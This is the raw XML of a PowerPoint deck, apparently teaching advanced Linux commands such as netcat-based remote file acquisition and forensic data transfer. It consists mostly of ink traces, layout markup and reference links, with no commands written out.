  <inkml:trace contextRef="#ctx0" brushRef="#br0">196 1 24575,'1'8'0,"1"1"0,0-1 0,1 1 0,0-1 0,0 0 0,0 0 0,1 0 0,1-1 0,-1 1 0,1-1 0,0 0 0,13 13 0,-9-8 0,-1 1 0,-1 0 0,1 1 0,9 28 0,-3-9 0,-12-29 0,0 0 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,0 0 0,-3 4 0,-4 4 0,-1 0 0,0-1 0,-1 0 0,-21 16 0,2-1 0,8-7 0,-15 16 0,0 9 0,22-27 0,1 0 0,0 1 0,-15 27 0,26-39-227,0 0-1,-1-1 1,0 1-1,0-1 1,-10 9-1,5-6-6598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1:56:20.713"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 8263 24575,'2258'0'-592,"-2227"-1"592,41-7 0,-42 3 0,44 0 0,-53 4 305,41-7 0,6-1-323,1-1 18,-49 6 0,37-2 0,-6 3 0,63-13 0,-66 8 0,81-3 0,-61 7-439,79-14-1,-140 17 489,342-40-49,-167 27-1434,-117 12 1493,71-12 0,244-38-59,-95 15-1888,5 9 1455,-15 2-141,-134 12-76,58-8 707,-87 2-57,109-13 0,396-44 1892,-522 61-1892,120-17 0,-136 22 0,-32 4 0,59-1 0,-54 5 172,-1-1 0,93-22-1,100-41 658,-105 26-628,159-40-89,-216 52-95,-65 22 21,0 0 1,0 2-1,1 0 1,35-5-1,-21 5-28,0 0-1,0-2 1,52-18-1,68-17-24,-44 14 181,106-30-1514,129-40 1155,-212 63-301,-84 24 495,86-32 0,23-12-173,-13 4-967,10-9 1112,-27 12 281,143-76 0,-192 80-215,113-56-42,-141 80 3,-30 14 0,0-2 0,28-16 0,48-34 0,222-129 0,-36 22 1591,-216 117-962,-46 33-532,2 0-1,0 1 1,42-21 0,-38 24-97,-1-1 0,0 0 0,-1-2 0,40-31 0,8-13-341,138-84 0,-15 12 341,-115 74 0,86-45 0,-128 79-92,-1-1 0,43-36-1,-53 38-223,104-72 316,-39 27 0,-49 38 0,58-52 0,-60 42 43,79-79 638,-72 66-72,38-49 562,-17 20-698,-28 34-268,-34 39-205,197-223 0,-65 100 0,-16 24 0,-63 56 0,118-87 0,-103 80 0,24-21 0,-70 56 0,0 1 0,2 1 0,1 2 0,0 0 0,36-13 0,-18 8 0,-32 13 0,0 0 0,30-25 0,6-5 0,-25 20 0,0-1 0,36-38 0,-61 56 0,76-58 0,-38 21 0,1 1 0,74-51 0,5-9 0,-36 27 0,-41 39 0,-27 23 0,-1-2 0,0-1 0,-1 0 0,-1 0 0,0-2 0,16-20 0,-23 27 0,0 0 0,0 1 0,0-1 0,1 2 0,0-1 0,1 1 0,-1 1 0,1-1 0,11-4 0,32-23 0,94-95 0,-68 57 0,-63 59 0,1 0 0,33-17 0,-33 20 0,0-1 0,0 0 0,23-20 0,131-140 0,-161 162 0,1 0 0,1 1 0,-1 0 0,22-10 0,23-14 0,5-17 0,-37 28 0,48-31 0,-56 42 0,106-68 0,-38 21 0,-48 34 0,49-41 0,-54 37 0,-15 14 0,-2 0 0,0 0 0,18-21 0,-23 21 0,0 2 0,0-1 0,0 1 0,1 0 0,0 1 0,0 0 0,16-10 0,-17 13 0,0 0 0,0-1 0,-1 0 0,0 0 0,8-11 0,-8 9 0,0 1 0,1 0 0,-1 1 0,17-12 0,-2 2 0,0 0 0,-2-1 0,26-28 0,-29 27 0,1 1 0,1 1 0,0 1 0,29-18 0,-37 27 0,0 0 0,0-1 0,0 0 0,-1-1 0,0 0 0,-1-1 0,14-17 0,59-61 0,-69 72 0,0 1 0,1 1 0,1 0 0,0 1 0,1 0 0,0 1 0,27-14 0,-21 11 0,-1 0 0,-1-1 0,-1-1 0,0 0 0,-1-2 0,-1 0 0,27-40 0,-37 51 0,1-1 0,0 1 0,0 1 0,0 0 0,19-12 0,-17 12 0,-1 1 0,1-2 0,-1 1 0,-1-2 0,10-9 0,36-51 0,30-42 0,-70 93 0,1 1 0,1 1 0,0 0 0,1 1 0,21-14 0,-12 10 0,34-36 0,-53 47 0,0 0 0,-1-1 0,0 0 0,-1 0 0,0 0 0,5-14 0,5-7 0,-12 23 0,-1 1 0,1 0 0,0 1 0,0-1 0,0 1 0,1-1 0,0 1 0,0 1 0,0-1 0,0 0 0,1 1 0,9-7 0,-7 6 0,0 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 0 0,-1 0 0,8-14 0,-8 13 0,0-1 0,1 1 0,0-1 0,0 2 0,1-1 0,9-6 0,53-45 106,-49 40-841,37-27-1,-47 39-6090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1:56:22.586"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 39 24575,'27'0'0,"0"0"0,1 0 0,0-2 0,43-8 0,-47 4 0,-4 1 0,1 0 0,0 1 0,0 1 0,35 0 0,-54 3 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 0,0 1 0,-1-1 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 3 0,0 10 0,0 0 0,-1-1 0,-3 23 0,1-12 0,1 71-1365,1-79-5461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1:56:26.839"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 4 24575,'3'0'0,"1"-3"0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1:56:28.352"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>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22:02:34.505"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 1 24575,'0'3'0,"4"2"0,4-1 0,0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58D5F-65FB-4E17-9D5B-8CF1DE5A98DF}"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9544B-F866-4ED0-8997-24601187AE87}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159519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97145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8884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15546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03594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7236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215974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54726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51931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92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281247" y="2215683"/>
            <a:ext cx="7068800" cy="1546400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3700"/>
              <a:buNone/>
              <a:defRPr sz="4933" b="0"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4281180" y="3818903"/>
            <a:ext cx="7068800" cy="1046400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>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4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1C4587"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
              <a:defRPr sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C4587"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3900599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997233" y="300033"/>
            <a:ext cx="8187200" cy="11432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997233" y="1737116"/>
            <a:ext cx="8187200" cy="4814400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="609585" lvl="0" indent="-516454">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2500"/>
              <a:buChar char="✘"/>
              <a:defRPr sz="3333"/>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24" name="Google Shape;324;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="120825" y="6296983"/>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107876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6785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0817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20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02801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22972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8177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957744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07431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11/23/2022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8" name="Picture 7" descr="Shape&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F71804F-5703-D2FE-0A23-734EC7153D0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772418" y="6082817"/>
            <a:ext cx="681102" cy="681037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19689706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customXml" Target="../ink/ink1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customXml" Target="../ink/ink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0.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.tif"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink16.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customXml" Target="../ink/ink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38.jpeg"/><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301.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink25.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image341.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image270.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image321.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.tif"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink24.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink26.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image291.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image311.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink21.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image331.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image280.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink23.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide26.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image" Target="../media/image330.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink34.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink38.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image370.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image300.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image350.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image390.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink33.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink35.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink28.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image320.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink37.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image290.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image340.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image380.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink39.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image360.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink27.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image310.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink32.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink36.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image400.png"/></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Standard_streams" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.learnlinux.org.za/courses/build/shell-scripting/ch01s04.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerhope.com/unix/nc.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.brianstorti.com/understanding-shell-script-idiom-redirec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5.xml"/><Relationship Id="rId1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customXml" Target="../ink/ink2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7.xml"/><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15.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink3.xml"/><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customXml" Target="../ink/ink9.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101010 data lines to infinity">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E2D0D23-F351-CA3C-DFFA-0951E15AAD86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="21887" t="9091" r="10117"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668867" y="1678666"/>
            <a:ext cx="4088190" cy="2369093"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800"/>
              <a:t>Advanced Linux Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Subtitle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2871076-CFC8-4CD5-BF65-ECB4ACAEF8D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677335" y="4050831"/>
            <a:ext cx="4079721" cy="1096901"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Remote File Acquisition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 33">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250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00"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">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Chatting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127425" y="1443234"/>
            <a:ext cx="8795217" cy="5087548"/>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BE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10036847" y="3735279"/>
              <a:ext cx="4320" cy="5760"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10027847" y="3726639"/>
                <a:ext cx="21960" cy="23400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241664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Forensic Data Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
